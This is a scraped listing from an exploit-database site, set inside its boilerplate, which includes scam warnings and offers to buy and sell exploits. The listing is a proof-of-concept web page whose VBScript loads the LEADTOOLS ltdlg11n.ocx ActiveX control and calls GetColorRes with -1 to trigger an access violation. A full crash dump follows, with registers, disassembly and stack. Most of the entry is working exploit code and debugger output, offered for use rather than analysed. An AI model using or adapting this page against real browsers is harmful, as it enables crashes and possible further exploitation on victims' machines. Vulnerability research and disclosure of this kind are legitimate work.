0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LEADTOOLS v11.5.0.9 ltdlg11n.ocx GetColorRes() Access Violation
=============================================================== LEADTOOLS v11.5.0.9 ltdlg11n.ocx GetColorRes() Access Violation =============================================================== <html> Test Exploit Page <object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object> <script language='vbscript'> targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx" prototype = "Function GetColorRes ( ByVal hWnd As Long ) As Integer" memberName = "GetColorRes" progid = "LEADDlgLib.LEADDlg" argCount = 1 arg1=-1 target.GetColorRes arg1 </script> Exception Code: ACCESS_VIOLATION Disasm: 7E428FB5 MOV [EAX],ECX Seh Chain: -------------------------------------------------- 1 73352960 VBSCRIPT.dll 2 7C839AD8 KERNEL32.dll Called From Returns To -------------------------------------------------- USER32.7E428FB5 LTKRN11n.2000A033 Registers: -------------------------------------------------- EIP 7E428FB5 -> 8B044689 EAX 7713643C -> 8B044689 EBX 00000000 ECX 00000000 EDX 00000001 EDI 02AB1FE0 -> 00000000 ESI 771363F8 -> F33BF08B EBP 0013EC60 -> 00000000 ESP 0013EC60 -> 00000000 Block Disassembly: -------------------------------------------------- 7E428FA8 PUSH EBP 7E428FA9 MOV EBP,ESP 7E428FAB MOV EAX,[EBP+8] 7E428FAE TEST EAX,EAX 7E428FB0 JE SHORT 7E428FCC 7E428FB2 MOV ECX,[EBP+C] 7E428FB5 MOV [EAX],ECX <--- CRASH 7E428FB7 MOV ECX,[EBP+10] 7E428FBA MOV [EAX+4],ECX 7E428FBD MOV ECX,[EBP+14] 7E428FC0 MOV [EAX+8],ECX 7E428FC3 MOV ECX,[EBP+18] 7E428FC6 MOV [EAX+C],ECX 7E428FC9 XOR EAX,EAX 7E428FCB INC EAX ArgDump: -------------------------------------------------- EBP+8 7713643C -> 8B044689 EBP+12 00000000 EBP+16 00000000 EBP+20 00000000 EBP+24 00000000 EBP+28 02AB1FE0 -> 00000000 Stack Dump: -------------------------------------------------- 13EC60 00 00 00 00 33 A0 00 20 3C 64 13 77 00 00 00 00 [.........d.w....] 13EC70 00 00 00 00 00 00 00 00 00 00 00 00 E0 1F AB 02 [................] 13EC80 D4 EC 13 00 20 1A FF 1F F8 63 13 77 E0 1F AB 02 [.........c.w....] 13EC90 B4 ED 13 00 3A 11 BE 1F D4 EC 13 00 AC ED 13 00 [................] 13ECA0 E0 1F AB 02 58 1F AB 02 F8 1E AB 02 00 00 00 00 [....X...........] ApiLog -------------------------------------------------- ***** Installing Hooks ***** 7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) 7c821a94 CreateFileA(C:\WINDOWS\system32\rsaenh.dll) # 0day.today [2024-12-24] #